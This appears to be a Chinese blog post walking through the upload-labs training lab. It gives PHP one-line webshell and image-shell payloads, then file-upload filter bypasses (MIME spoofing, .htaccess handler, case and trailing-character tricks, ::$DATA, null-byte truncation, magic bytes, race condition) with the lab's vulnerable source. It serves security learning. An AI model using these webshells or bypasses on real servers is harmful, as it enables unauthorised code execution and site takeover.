

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/head.png">
  <link rel="icon" type="image/png" href="/img/head.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="SE_Null">
  <meta name="keywords" content="">
  <title>upload-labs通关记录 - SE_Null</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
    
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_pf9vaxs7x7b.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>SE_Null</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/5.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container page-header text-center fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-06-01 20:27" pubdate>
        June 1, 2020 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      6.8k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      86
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto" id="post">
            <!-- SEO header -->
            <h1 style="display: none">upload-labs通关记录</h1>
            
            <div class="markdown-body" id="post-body">
              <p>本文是upload-labs通关记录。</p>
<a id="more"></a>



<h3 id="前期准备"><a href="#前期准备" class="headerlink" title="前期准备"></a>前期准备</h3><p>制作一个一句话木马：<code>&lt;?php @eval($_POST[1]);?&gt;</code></p>
<p>制作一个图片马：<code>copy 1.jpg/b +ma.php/a ma.jpg</code></p>
<p>图片马内容：<code>&lt;?php  fputs(fopen(&#39;xx.php&#39;,&#39;w&#39;),&#39;&lt;?php @eval($_POST[1]);?&gt;&#39;); ?&gt;</code></p>
<h3 id="Pass-01：前端js验证"><a href="#Pass-01：前端js验证" class="headerlink" title="Pass-01：前端js验证"></a>Pass-01：前端js验证</h3><p>随意选个马子传一下，结果秒显不允许</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215110356885.png" srcset="/img/loading.gif" alt="image-20210215110356885"></p>
<p>猜测前端js检查了，验证前端代码</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215110544819.png" srcset="/img/loading.gif" alt="image-20210215110544819"></p>
<p><strong>绕过</strong></p>
<p>关了浏览器的前端js验证。</p>
<p>当然你要是嫌关js麻烦，你传个图片马就o了</p>
<p>上传图片马，然后文件包含</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215154901813.png" srcset="/img/loading.gif" alt="image-20210215154901813"></p>
<p>菜刀连接</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215154959908.png" srcset="/img/loading.gif" alt="image-20210215154959908"></p>
<h3 id="Pass-02：MIME"><a href="#Pass-02：MIME" class="headerlink" title="Pass-02：MIME"></a>Pass-02：MIME</h3><p>老规矩，搞个马子传一下</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215122215429.png" srcset="/img/loading.gif" alt="image-20210215122215429"></p>
<p>看一下后台源代码</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215122237531.png" srcset="/img/loading.gif" alt="image-20210215122237531"></p>
<p><strong>绕过</strong>验证MIME类型的，抓包改一下MIME为image/jpeg就o了</p>
<p>嫌抓包麻烦，直接传个图片马也可以。</p>
<h3 id="Pass-03：宽松的黑名单"><a href="#Pass-03：宽松的黑名单" class="headerlink" title="Pass-03：宽松的黑名单"></a>Pass-03：宽松的黑名单</h3><p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215124206217.png" srcset="/img/loading.gif" alt="image-20210215124206217"></p>
<p>一看黑名单验证，查看后台源码</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215124326909.png" srcset="/img/loading.gif" alt="image-20210215124326909"></p>
<p>果然。</p>
<p><strong>绕过</strong></p>
<p>这个黑名单限制不是很全，找一个没有在限制里面的后缀就可以绕过，比如php3，但是当上传的这些文件要被当作php来执行，需要有以下条件：即Apache的httpd.conf有如下配置代码</p>
<pre><code class="hljs jboss-cli">AddType application/x-httpd-php <span class="hljs-string">.php</span> <span class="hljs-string">.phtml</span> <span class="hljs-string">.phps</span> <span class="hljs-string">.php5</span> <span class="hljs-string">.pht</span> <span class="hljs-string">.ph3</span>
<span class="hljs-comment">#配置里面有你所上传的后缀</span></code></pre>

<p>此处黑名单没有过滤.htaccess后缀，故此处也可上传.htaccess文件进行绕过。</p>
<p>或者传个图片马</p>
<h3 id="Pass-04-htaccsess"><a href="#Pass-04-htaccsess" class="headerlink" title="Pass-04:.htaccsess"></a>Pass-04:.htaccsess</h3><p>找个马子试一下</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215125826838.png" srcset="/img/loading.gif" alt="image-20210215125826838"></p>
<p>看了下后台，比较长，不好列举，就以提示给的tips列举</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215125736761.png" srcset="/img/loading.gif" alt="image-20210215125736761"></p>
<p><strong>绕过</strong></p>
<p>可以看到没有限制.htaccsess文件，故可以上传.htaccsess文件绕过。内容如下</p>
<pre><code class="hljs apache"><span class="hljs-attribute"><span class="hljs-nomarkup">SetHandler</span></span> application/x-httpd-php</code></pre>

<p>这样所有文件都会解析为php，然后再上传图片马，就可以解析为php</p>
<h3 id="Pass-05：后缀大小写"><a href="#Pass-05：后缀大小写" class="headerlink" title="Pass-05：后缀大小写"></a>Pass-05：后缀大小写</h3><p>查看后台，这回完犊子了，加了.htaccess</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215133655371.png" srcset="/img/loading.gif" alt="image-20210215133655371"></p>
<p>仔细看后台源代码，并没有转换大小写</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215134635811.png" srcset="/img/loading.gif" alt="image-20210215134635811"></p>
<p><strong>绕过</strong></p>
<p>更改马子的后缀大小写，例如：<code>ma.Php</code></p>
<h3 id="Pass-06-空格绕过"><a href="#Pass-06-空格绕过" class="headerlink" title="Pass-06:空格绕过"></a>Pass-06:空格绕过</h3><p>仔细看后台源码</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215135013175.png" srcset="/img/loading.gif" alt="image-20210215135013175"></p>
<p>相比于上面Pass-05代码，这里将文件后缀名统一进行了小写转换，但是没有去除文件名首尾的空格。所以此处可以利用windows系统的命名规则进行绕过。</p>
<p><strong>绕过</strong></p>
<p>抓包在filename后面加个空格</p>
<h3 id="Pass-07：点绕过"><a href="#Pass-07：点绕过" class="headerlink" title="Pass-07：点绕过"></a>Pass-07：点绕过</h3><p>仔细看后台</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215140041505.png" srcset="/img/loading.gif" alt="image-20210215140041505"></p>
<p>可以发现相比于Pass-06代码，加上了首尾去空，但是却少了尾部去点。故和上面Pass-06一样，利用windows文件命名规则绕过。</p>
<p><strong>绕过</strong></p>
<p>抓包在filename后面加个“.”</p>
<h3 id="Pass-08-：-DATE"><a href="#Pass-08-：-DATE" class="headerlink" title="Pass-08 ：::$DATE"></a>Pass-08 ：::$DATE</h3><p>后台源码</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215140137448.png" srcset="/img/loading.gif" alt="image-20210215140137448"></p>
<p>可以看到，与前面第七关的代码相比，少了去除文件名的”::$DATA”字符串这一步。这里还是利用windows的一个特性。</p>
<blockquote>
<p>NTFS文件系统包括对备用数据流的支持。这不是众所周知的功能，主要包括提供与Macintosh文件系统中的文件的兼容性。备用数据流允许文件包含多个数据流。每个文件至少有一个数据流。在Windows中，此默认数据流称为：$ DATA。</p>
</blockquote>
<p>简单讲就是在php+windows的情况下：如果文件名+<code>&quot;::$DATA&quot;</code>会把<code>::$DATA</code>之后的数据当成文件流处理，不会检测后缀名.且保持<code>&quot;::$DATA&quot;</code>之前的文件名。</p>
<p><em>注:仅windows适用</em></p>
<p><strong>绕过</strong></p>
<p>用burp将上传文件后缀改为:<code>xx.php::$DATA</code>即可</p>
<h3 id="Pass-09：点空格点"><a href="#Pass-09：点空格点" class="headerlink" title="Pass-09：点空格点"></a>Pass-09：点空格点</h3><p>后台</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215140532614.png" srcset="/img/loading.gif" alt="image-20210215140532614"></p>
<p>可以看到，这里代码的安全性比之前的都要更高，黑名单类型全，大小写经过转换，去除了文件名末尾的点，去除了文件名尾空格，还去除了::$DATA。。但是，这里还是可以绕过的。这里的代码逻辑是先删除文件名末尾的点，再进行首尾去空。都只进行一次。</p>
<p><strong>绕过</strong></p>
<p>抓包构造点空格点进行绕过，也就是后缀名改为<code>xx.php. .</code></p>
<h3 id="Pass-10：双写绕过"><a href="#Pass-10：双写绕过" class="headerlink" title="Pass-10：双写绕过"></a>Pass-10：双写绕过</h3><p>后台</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215141032311.png" srcset="/img/loading.gif" alt="image-20210215141032311"></p>
<p>分析注意：<strong>str_ireplace</strong>函数<strong>不区分大小写</strong>的替换字符串中的一些字符，此次源码将黑名单里的文件后缀名替换成空字符。</p>
<p><strong>绕过</strong></p>
<p>用burp修改后缀名为 <code>.pphphp</code></p>
<h3 id="Pass-11：00截断"><a href="#Pass-11：00截断" class="headerlink" title="Pass-11：00截断"></a>Pass-11：00截断</h3><p>查看后台源码</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215141813823.png" srcset="/img/loading.gif" alt="image-20210215141813823"></p>
<p>这里与之前代码相比，使用了白名单，只允许上传，jpg，png，gif三种格式文件。但是在进行move_uploaded_file前。利用<code>GET[&#39;save_path&#39;]</code>和随机时间函数进行拼接，拼接成文件存储路径。这里构造文件存储路径利用了_GET传入，导致服务器最终存储的文件名可控。故可以利用这个点进行绕过。</p>
<p><strong>绕过</strong></p>
<p>00截断。即move_uploaded_file函数的底层实现类似于C语言，遇到0x00会截断</p>
<blockquote>
<p>截断条件：<br>1、php版本小于5.3.4<br>2、php.ini的magic_quotes_gpc为OFF状态</p>
</blockquote>
<p>抓包进行修改</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215142538909.png" srcset="/img/loading.gif" alt="image-20210215142538909"></p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215142754495.png" srcset="/img/loading.gif" alt="image-20210215142754495"></p>
<h3 id="Pass-12：-00"><a href="#Pass-12：-00" class="headerlink" title="Pass-12：%00"></a>Pass-12：%00</h3><p>后台源码</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215143512734.png" srcset="/img/loading.gif" alt="image-20210215143512734"></p>
<p>这里代码与上面Pass-11代码类似，不过是save_path参数由GET传入变为POST传入，还是利用00截断，但这次需要在二进制中进行修改，因为post不会像get对%00进行自动解码。</p>
<p><strong>绕过</strong></p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215145042313.png" srcset="/img/loading.gif" alt="image-20210215145042313"></p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215145151607.png" srcset="/img/loading.gif" alt="image-20210215145151607"></p>
<h3 id="Pass-13：文件头检测"><a href="#Pass-13：文件头检测" class="headerlink" title="Pass-13：文件头检测"></a>Pass-13：文件头检测</h3><p>这一关开始上传图片马，后台</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215161722242.png" srcset="/img/loading.gif" alt="image-20210215161722242"></p>
<p>使用了 getReailFileType函数</p>
<p><strong>绕过</strong></p>
<p>burp抓包添加一个图片文件的文件幻数</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215161612151.png" srcset="/img/loading.gif" alt="image-20210215161612151"></p>
<p>或者直接上传一张图片马即可。</p>
<h3 id="Pass-14：getimagesize"><a href="#Pass-14：getimagesize" class="headerlink" title="Pass-14：getimagesize"></a>Pass-14：getimagesize</h3><p>查看后台源码</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215151630875.png" srcset="/img/loading.gif" alt="image-20210215151630875"></p>
<p>使用了getimagesize函数来验证，加对应图片的文件头就o了</p>
<p>比如：gif-GIF89a</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215153117383.png" srcset="/img/loading.gif" alt="image-20210215153117383"></p>
<p>或者传一个图片马子</p>
<h3 id="Pass-15：exif-imagetype"><a href="#Pass-15：exif-imagetype" class="headerlink" title="Pass-15：exif_imagetype()"></a>Pass-15：exif_imagetype()</h3><p>后台</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215153456115.png" srcset="/img/loading.gif" alt="image-20210215153456115"></p>
<p><strong>绕过</strong></p>
<p>同13、14一样</p>
<h3 id="Pass-16：二次渲染"><a href="#Pass-16：二次渲染" class="headerlink" title="Pass-16：二次渲染"></a>Pass-16：二次渲染</h3><p>后台</p>
<pre><code class="hljs php">$is_upload = <span class="hljs-literal">false</span>;
$msg = <span class="hljs-literal">null</span>;
<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($_POST[<span class="hljs-string">&#x27;submit&#x27;</span>]))&#123;
    <span class="hljs-comment">// 获得上传文件的基本信息，文件名，类型，大小，临时文件路径</span>
    $filename = $_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;name&#x27;</span>];
    $filetype = $_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;type&#x27;</span>];
    $tmpname = $_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;tmp_name&#x27;</span>];

    $target_path=UPLOAD_PATH.<span class="hljs-string">&#x27;/&#x27;</span>.basename($filename);

    <span class="hljs-comment">// 获得上传文件的扩展名</span>
    $fileext= substr(strrchr($filename,<span class="hljs-string">&quot;.&quot;</span>),<span class="hljs-number">1</span>);

    <span class="hljs-comment">//判断文件后缀与类型，合法才进行上传操作</span>
    <span class="hljs-keyword">if</span>(($fileext == <span class="hljs-string">&quot;jpg&quot;</span>) &amp;&amp; ($filetype==<span class="hljs-string">&quot;image/jpeg&quot;</span>))&#123;
        <span class="hljs-keyword">if</span>(move_uploaded_file($tmpname,$target_path))&#123;
            <span class="hljs-comment">//使用上传的图片生成新的图片</span>
            $im = imagecreatefromjpeg($target_path);

            <span class="hljs-keyword">if</span>($im == <span class="hljs-literal">false</span>)&#123;
                $msg = <span class="hljs-string">&quot;该文件不是jpg格式的图片！&quot;</span>;
                @unlink($target_path);
            &#125;<span class="hljs-keyword">else</span>&#123;
                <span class="hljs-comment">//给新图片指定文件名</span>
                srand(time());
                $newfilename = strval(rand()).<span class="hljs-string">&quot;.jpg&quot;</span>;
                <span class="hljs-comment">//显示二次渲染后的图片（使用用户上传图片生成的新图片）</span>
                $img_path = UPLOAD_PATH.<span class="hljs-string">&#x27;/&#x27;</span>.$newfilename;
                imagejpeg($im,$img_path);
                @unlink($target_path);
                $is_upload = <span class="hljs-literal">true</span>;
            &#125;
        &#125; <span class="hljs-keyword">else</span> &#123;
            $msg = <span class="hljs-string">&quot;上传出错！&quot;</span>;
        &#125;

    &#125;<span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span>(($fileext == <span class="hljs-string">&quot;png&quot;</span>) &amp;&amp; ($filetype==<span class="hljs-string">&quot;image/png&quot;</span>))&#123;
        <span class="hljs-keyword">if</span>(move_uploaded_file($tmpname,$target_path))&#123;
            <span class="hljs-comment">//使用上传的图片生成新的图片</span>
            $im = imagecreatefrompng($target_path);

            <span class="hljs-keyword">if</span>($im == <span class="hljs-literal">false</span>)&#123;
                $msg = <span class="hljs-string">&quot;该文件不是png格式的图片！&quot;</span>;
                @unlink($target_path);
            &#125;<span class="hljs-keyword">else</span>&#123;
                 <span class="hljs-comment">//给新图片指定文件名</span>
                srand(time());
                $newfilename = strval(rand()).<span class="hljs-string">&quot;.png&quot;</span>;
                <span class="hljs-comment">//显示二次渲染后的图片（使用用户上传图片生成的新图片）</span>
                $img_path = UPLOAD_PATH.<span class="hljs-string">&#x27;/&#x27;</span>.$newfilename;
                imagepng($im,$img_path);

                @unlink($target_path);
                $is_upload = <span class="hljs-literal">true</span>;               
            &#125;
        &#125; <span class="hljs-keyword">else</span> &#123;
            $msg = <span class="hljs-string">&quot;上传出错！&quot;</span>;
        &#125;

    &#125;<span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span>(($fileext == <span class="hljs-string">&quot;gif&quot;</span>) &amp;&amp; ($filetype==<span class="hljs-string">&quot;image/gif&quot;</span>))&#123;
        <span class="hljs-keyword">if</span>(move_uploaded_file($tmpname,$target_path))&#123;
            <span class="hljs-comment">//使用上传的图片生成新的图片</span>
            $im = imagecreatefromgif($target_path);
            <span class="hljs-keyword">if</span>($im == <span class="hljs-literal">false</span>)&#123;
                $msg = <span class="hljs-string">&quot;该文件不是gif格式的图片！&quot;</span>;
                @unlink($target_path);
            &#125;<span class="hljs-keyword">else</span>&#123;
                <span class="hljs-comment">//给新图片指定文件名</span>
                srand(time());
                $newfilename = strval(rand()).<span class="hljs-string">&quot;.gif&quot;</span>;
                <span class="hljs-comment">//显示二次渲染后的图片（使用用户上传图片生成的新图片）</span>
                $img_path = UPLOAD_PATH.<span class="hljs-string">&#x27;/&#x27;</span>.$newfilename;
                imagegif($im,$img_path);

                @unlink($target_path);
                $is_upload = <span class="hljs-literal">true</span>;
            &#125;
        &#125; <span class="hljs-keyword">else</span> &#123;
            $msg = <span class="hljs-string">&quot;上传出错！&quot;</span>;
        &#125;
    &#125;<span class="hljs-keyword">else</span>&#123;
        $msg = <span class="hljs-string">&quot;只允许上传后缀为.jpg|.png|.gif的图片文件！&quot;</span>;
    &#125;
&#125;</code></pre>

<p>可以看到，这里先是判断Content-Type，然后再用imagecreatefrom[gif|png|jpg]函数判断是否是图片格式，如果是图片的话再用image[gif|png|jpg]函数对其进行二次渲染。</p>
<p>这里就不再对比上传图片马前后的区别，直接结论：图片马的恶意内容被磨除了。</p>
<p><strong>绕过</strong></p>
<p>如果想要绕过二次渲染的话，就要搞清楚二次渲染后，源文件哪些区域不会被修改或压缩。这里因为gif、jpg、png三种不同图片文件的文件格式不同，所以图片马的构造方法也不同，具体可以参考我的上一篇文章中有总结：“文件上传”</p>
<h3 id="Pass-17：条件竞争时间差"><a href="#Pass-17：条件竞争时间差" class="headerlink" title="Pass-17：条件竞争时间差"></a>Pass-17：条件竞争时间差</h3><p>后台</p>
<pre><code class="hljs php"><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>($_POST[<span class="hljs-string">&#x27;submit&#x27;</span>]))&#123;
    $ext_arr = <span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;jpg&#x27;</span>,<span class="hljs-string">&#x27;png&#x27;</span>,<span class="hljs-string">&#x27;gif&#x27;</span>);
    $file_name = $_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;name&#x27;</span>];
    $temp_file = $_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;tmp_name&#x27;</span>];
    $file_ext = substr($file_name,strrpos($file_name,<span class="hljs-string">&quot;.&quot;</span>)+<span class="hljs-number">1</span>);
    $upload_file = UPLOAD_PATH . <span class="hljs-string">&#x27;/&#x27;</span> . $file_name;

    <span class="hljs-keyword">if</span>(move_uploaded_file($temp_file, $upload_file))&#123;
        <span class="hljs-keyword">if</span>(in_array($file_ext,$ext_arr))&#123;
             $img_path = UPLOAD_PATH . <span class="hljs-string">&#x27;/&#x27;</span>. rand(<span class="hljs-number">10</span>, <span class="hljs-number">99</span>).date(<span class="hljs-string">&quot;YmdHis&quot;</span>).<span class="hljs-string">&quot;.&quot;</span>.$file_ext;
             rename($upload_file, $img_path);
             $is_upload = <span class="hljs-literal">true</span>;
        &#125;<span class="hljs-keyword">else</span>&#123;
            $msg = <span class="hljs-string">&quot;只允许上传.jpg|.png|.gif类型文件！&quot;</span>;
            unlink($upload_file);
        &#125;
    &#125;<span class="hljs-keyword">else</span>&#123;
        $msg = <span class="hljs-string">&#x27;上传出错！&#x27;</span>;
    &#125;
&#125;</code></pre>

<p>不难发现，这里是先move_uploaded_file函数将上传文件临时保存，再进行判断，如果不在白名单里则unlink删除，在的话就rename重命名，所以这里存在条件竞争。</p>
<p><strong>绕过</strong></p>
<p>用burp开启两个intruder模块，一个用于重复上传，另一个用于重复访问。</p>
<p>1、先设置上传请求,记住此处的文件名，等下要用来拼接访问请求的url</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215163251176.png" srcset="/img/loading.gif" alt="image-20210215163251176"></p>
<p>2、因为此处没有什么参数需要爆破，只是需要重复发起请求，所以payload设置为Null payloads,设置访问次数5000次，线程50个</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215164100568.png" srcset="/img/loading.gif" alt="image-20210215164100568"></p>
<p>3、接下来设置访问请求<br>1、浏览器构造请求url：<code>http://127.0.0.1/upload-labs/upload/ma.Php</code>,进行访问，然后用burp抓包<br>2、burp抓包后发送至intruder模块，然后设置payload，这一步和上传请求设置差不多,都是Null payloads、5000次、50个线程</p>
<p>3、设置好两个模块后同时启动，观察结果，因为我们传入的php代码是<code>phpinfo();</code>,所以如果访问成功的话，会返回php的配置信息。</p>
<p>注意：条件竞争绕过存在一定概率，实践中如果一次不成功，可以多试几次。</p>
<p>另外一种方法，在上一篇文章中也讲过</p>
<p>也可以上传图片马</p>
<h3 id="Pass-18：突破上传重命名"><a href="#Pass-18：突破上传重命名" class="headerlink" title="Pass-18：突破上传重命名"></a>Pass-18：突破上传重命名</h3><p>这里先将上传的文件保存（move函数），再rename重命名一下。所以也存在条件竞争，绕过方法和上面Pass-17差不多，这里就不重复写了。这里先将上传的文件保存（move函数），再rename重命名一下。所以也存在条件竞争，绕过方法和上面Pass-17差不多，这里就不重复写了。</p>
<h3 id="Pass-19：-绕过"><a href="#Pass-19：-绕过" class="headerlink" title="Pass-19：./绕过"></a>Pass-19：./绕过</h3><p>后台</p>
<pre><code class="hljs php">$is_upload = <span class="hljs-literal">false</span>;
$msg = <span class="hljs-literal">null</span>;
<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($_POST[<span class="hljs-string">&#x27;submit&#x27;</span>])) &#123;
    <span class="hljs-keyword">if</span> (file_exists(UPLOAD_PATH)) &#123;
        $deny_ext = <span class="hljs-keyword">array</span>(<span class="hljs-string">&quot;php&quot;</span>,<span class="hljs-string">&quot;php5&quot;</span>,<span class="hljs-string">&quot;php4&quot;</span>,<span class="hljs-string">&quot;php3&quot;</span>,<span class="hljs-string">&quot;php2&quot;</span>,<span class="hljs-string">&quot;html&quot;</span>,<span class="hljs-string">&quot;htm&quot;</span>,<span class="hljs-string">&quot;phtml&quot;</span>,<span class="hljs-string">&quot;pht&quot;</span>,<span class="hljs-string">&quot;jsp&quot;</span>,<span class="hljs-string">&quot;jspa&quot;</span>,<span class="hljs-string">&quot;jspx&quot;</span>,<span class="hljs-string">&quot;jsw&quot;</span>,<span class="hljs-string">&quot;jsv&quot;</span>,<span class="hljs-string">&quot;jspf&quot;</span>,<span class="hljs-string">&quot;jtml&quot;</span>,<span class="hljs-string">&quot;asp&quot;</span>,<span class="hljs-string">&quot;aspx&quot;</span>,<span class="hljs-string">&quot;asa&quot;</span>,<span class="hljs-string">&quot;asax&quot;</span>,<span class="hljs-string">&quot;ascx&quot;</span>,<span class="hljs-string">&quot;ashx&quot;</span>,<span class="hljs-string">&quot;asmx&quot;</span>,<span class="hljs-string">&quot;cer&quot;</span>,<span class="hljs-string">&quot;swf&quot;</span>,<span class="hljs-string">&quot;htaccess&quot;</span>);

        $file_name = $_POST[<span class="hljs-string">&#x27;save_name&#x27;</span>];
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);

        <span class="hljs-keyword">if</span>(!in_array($file_ext,$deny_ext)) &#123;
            $temp_file = $_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;tmp_name&#x27;</span>];
            $img_path = UPLOAD_PATH . <span class="hljs-string">&#x27;/&#x27;</span> .$file_name;
            <span class="hljs-keyword">if</span> (move_uploaded_file($temp_file, $img_path)) &#123; 
                $is_upload = <span class="hljs-literal">true</span>;
            &#125;<span class="hljs-keyword">else</span>&#123;
                $msg = <span class="hljs-string">&#x27;上传出错！&#x27;</span>;
            &#125;
        &#125;<span class="hljs-keyword">else</span>&#123;
            $msg = <span class="hljs-string">&#x27;禁止保存为该类型文件！&#x27;</span>;
        &#125;

    &#125; <span class="hljs-keyword">else</span> &#123;
        $msg = UPLOAD_PATH . <span class="hljs-string">&#x27;文件夹不存在,请手工创建！&#x27;</span>;
    &#125;
&#125;</code></pre>

